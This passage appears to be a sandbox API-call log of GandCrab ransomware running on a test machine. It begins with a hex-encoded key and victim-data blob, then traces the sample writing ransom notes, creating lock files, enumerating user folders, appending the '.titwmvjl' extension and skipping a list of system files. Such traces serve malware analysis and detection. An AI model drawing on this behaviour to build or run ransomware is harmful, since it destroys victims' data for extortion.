b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0093.760] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0093.760] CloseHandle (hObject=0x230) returned 1 [0093.760] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.761] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.761] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x44)) [0093.761] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.761] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.761] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.761] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a09d2ca4deb61a.lock") returned 55 [0093.761] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\onedrive\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0093.762] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.762] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.762] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\") returned 31 [0093.762] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\*" [0093.762] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5032f8 [0093.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.762] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.763] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.763] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.763] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.763] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0093.763] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0093.763] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a09d2ca4deb61a.lock" [0093.763] lstrlenW (lpString=".titwmvjl") returned 9 [0093.763] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a09d2ca4deb61a.lock") returned 55 [0093.763] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.763] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 64 [0093.764] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a09d2ca4deb61a.lock") returned 55 [0093.764] lstrlenW (lpString=".lock") returned 5 [0093.764] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.764] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0093.764] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.764] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.764] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.764] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0093.764] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0093.764] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini" [0093.764] lstrlenW (lpString=".titwmvjl") returned 9 [0093.764] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned 42 [0093.764] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.764] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini.titwmvjl") returned 51 [0093.764] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned 42 [0093.764] lstrlenW (lpString=".ini") returned 4 [0093.764] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.765] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0093.765] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0093.765] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.765] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned 42 [0093.765] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned 42 [0093.765] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0093.765] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.765] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.765] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.765] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.765] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\TITWMVJL-DECRYPT.txt" [0093.765] lstrlenW (lpString=".titwmvjl") returned 9 [0093.765] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\TITWMVJL-DECRYPT.txt") returned 51 [0093.765] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.765] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 60 [0093.765] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\TITWMVJL-DECRYPT.txt") returned 51 [0093.765] lstrlenW (lpString=".txt") returned 4 [0093.765] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.766] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.766] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.766] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.766] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\TITWMVJL-DECRYPT.txt") returned 51 [0093.766] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\TITWMVJL-DECRYPT.txt") returned 51 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.766] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.766] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.766] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0093.766] FindClose (in: hFindFile=0x5032f8 | out: hFindFile=0x5032f8) returned 1 [0093.767] CloseHandle (hObject=0x230) returned 1 [0093.767] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.767] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0093.767] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0093.767] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Pictures" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures" [0093.767] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\" [0093.767] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.767] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.767] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.767] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.767] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.767] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.768] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.768] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.768] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.768] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.768] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.768] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\\\TITWMVJL-DECRYPT.txt") returned 52 [0093.768] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0093.768] GetLastError () returned 0x50 [0093.768] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.769] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.769] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x53)) [0093.769] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.769] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.769] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.769] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 55 [0093.769] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0093.770] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.770] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.770] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\") returned 31 [0093.770] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\*" [0093.770] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5036f8 [0093.770] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.770] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.771] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.771] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.771] lstrcmpW (lpString1="3PVHyEjKu.png", lpString2=".") returned 1 [0093.771] lstrcmpW (lpString1="3PVHyEjKu.png", lpString2="..") returned 1 [0093.771] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="3PVHyEjKu.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png" [0093.771] lstrlenW (lpString=".titwmvjl") returned 9 [0093.771] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png") returned 44 [0093.771] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.771] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png.titwmvjl") returned 53 [0093.772] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png") returned 44 [0093.772] lstrlenW (lpString=".png") returned 4 [0093.772] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.772] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0093.772] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0093.772] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.772] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png") returned 44 [0093.772] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png") returned 44 [0093.772] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="desktop.ini") returned -1 [0093.772] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="autorun.inf") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="ntuser.dat") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="iconcache.db") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="bootsect.bak") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="boot.ini") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="ntuser.dat.log") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="thumbs.db") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="KRAB-DECRYPT.html") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="CRAB-DECRYPT.html") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="ntldr") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="NTDETECT.COM") returned -1 [0093.773] lstrcmpiW (lpString1="3PVHyEjKu.png", lpString2="Bootfont.bin") returned -1 [0093.773] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png") returned 44 [0093.773] lstrlenW (lpString=".png") returned 4 [0093.773] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.773] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0093.773] VirtualFree (lpAddress=0x2410000, dwSize=0x0, 